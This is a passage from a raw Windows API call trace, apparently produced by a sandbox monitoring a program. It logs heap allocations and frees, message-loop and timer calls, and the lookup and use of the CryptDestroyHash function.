returned 1 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0142.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0142.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0142.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0142.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0142.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0142.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0142.224] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0142.224] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0142.224] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0142.224] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0142.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0142.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0142.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0142.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0142.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0142.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0142.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0142.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0142.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0142.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c38 [0142.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.228] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0142.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0142.228] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0142.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0142.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0142.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0142.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0142.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0142.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0142.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0142.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0142.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0142.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0142.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699c8 [0142.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0142.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0142.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0142.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0142.231] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0142.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0142.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0142.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0142.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.231] CryptDestroyHash (hHash=0xa87350) returned 1 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 